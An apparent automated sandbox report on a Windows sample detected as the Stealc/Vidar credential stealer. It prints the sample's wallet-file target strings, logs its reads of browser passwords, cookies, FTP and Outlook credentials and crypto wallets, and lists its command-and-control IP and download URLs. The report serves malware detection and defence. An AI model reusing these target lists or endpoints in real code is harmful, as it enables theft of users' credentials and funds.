Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: .indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coin
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*&o
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6868, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1686260675.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1964639333.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1963816981.00000000006F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6868, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6868, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1538054 Sample: file.exe Startdate: 20/10/2024 Architecture: WINDOWS Score: 100 20 Suricata IDS alerts for network traffic 2->20 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 9 other signatures 2->26 5 file.exe 33 2->5         started        process3 dnsIp4 18 185.215.113.37, 49730, 80 WHOLESALECONNECTIONSNL Portugal 5->18 10 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 5->10 dropped 12 C:\Users\user\AppData\...\softokn3[1].dll, PE32 5->12 dropped 14 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 5->14 dropped 16 9 other files (none is malicious) 5->16 dropped 28 Detected unpacking (changes PE section rights) 5->28 30 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->30 32 Tries to steal Mail credentials (via file / registry access) 5->32 34 12 other signatures 5->34 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.37/ true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/e2b1563c6670f193.php true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll true
  • URL Reputation: malware
 unknown